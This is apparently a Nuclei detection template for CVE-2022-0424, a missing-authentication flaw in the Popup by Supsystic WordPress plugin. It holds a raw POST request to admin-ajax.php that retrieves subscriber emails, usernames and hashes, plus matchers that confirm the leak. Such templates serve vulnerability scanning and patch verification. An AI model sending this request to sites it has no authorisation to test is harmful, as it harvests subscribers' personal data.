nuclei-templates/http/cves/2022/CVE-2022-0424.yaml


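# Detection template for CVE-2022-0424. It checks whether the Popup by
# Supsystic subscriber-list AJAX action answers a request that carries no
# session cookie and no nonce.
id: CVE-2022-0424

info:
  name: Popup by Supsystic < 1.10.9 - Subscriber Email Addresses Disclosure
  author: Kazgangap
  severity: medium
  description: |
    The Popup by Supsystic WordPress plugin before 1.10.9 does not have any authentication and authorisation in an AJAX action, allowing unauthenticated attackers to call it and get the email addresses of subscribed users
  # Sites that match should update the plugin to 1.10.9 or later.
  remediation: Fixed in 1.10.9
  reference:
    - https://wpscan.com/vulnerability/1e4593fd-51e5-43ca-a244-9aaef3804b9f/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0424
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-0424
    cwe-id: CWE-306
    epss-score: 0.00082
    epss-percentile: 0.34103
    cpe: cpe:2.3:a:supsystic:popup:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: supsystic
    product: popup
    framework: wordpress
    publicwww-query: "/wp-content/plugins/popup-by-supsystic"
  tags: wpscan,cve,cve2022,wp,wp-plugin,wordpress,disclosure,popup

http:
  - raw:
      # One POST to admin-ajax.php. The blank line below separates the
      # headers from the form-encoded body and must be kept, otherwise the
      # body is read as another header line.
      # NOTE(review): rows=10 presumably keeps the returned listing small;
      # confirm against the plugin.
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        page=subscribe&action=getListForTbl&reqType=ajax&search=@&_search=false&pl=pps&sidx=id&rows=10

    # Both matchers must pass: all five markers of a subscriber listing are
    # present in the response, and the status is 200.
    # A matching response contains real subscriber email addresses, so any
    # stored responses or scan output should be handled as personal data.
    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"id":"'
          - 'username":"'
          - 'email":'
          - 'hash":"'
          - '_wpnonce'
        condition: and

      - type: status
        status:
          - 200

# NOTE(review): the "# digest:" trailer that follows is the signature over
# the template content. It is expected to stop verifying once the template
# is edited (including comment changes) and has to be regenerated before the
# template is treated as signed.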
# digest: 4b0a00483046022100e053c1b7ee05de6360e694dc677e8d63d3ff1f7e93d79f51b8809a143d15d129022100a8db2e359329761cce7c314fa1dee1e0309ec32e166b80b386d847eca28a6903:922c64590222798bb761d5b6d8e72950